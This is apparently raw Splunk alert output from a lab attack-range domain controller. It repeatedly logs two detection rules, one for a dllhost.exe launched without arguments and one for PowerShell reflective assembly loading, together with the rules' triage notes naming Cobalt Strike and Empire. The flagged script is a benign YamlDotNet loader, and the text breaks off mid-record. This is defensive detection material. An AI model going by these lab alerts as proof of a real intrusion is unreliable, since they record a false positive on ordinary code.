annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5488", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664974533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T11:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T11:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664974533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T11:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T11:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664974533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T11:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T11:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664974533, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T11:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T11:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664967600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664967600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2168", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664967600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664967600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x878", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664970932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664970932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T10:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T10:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664970932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 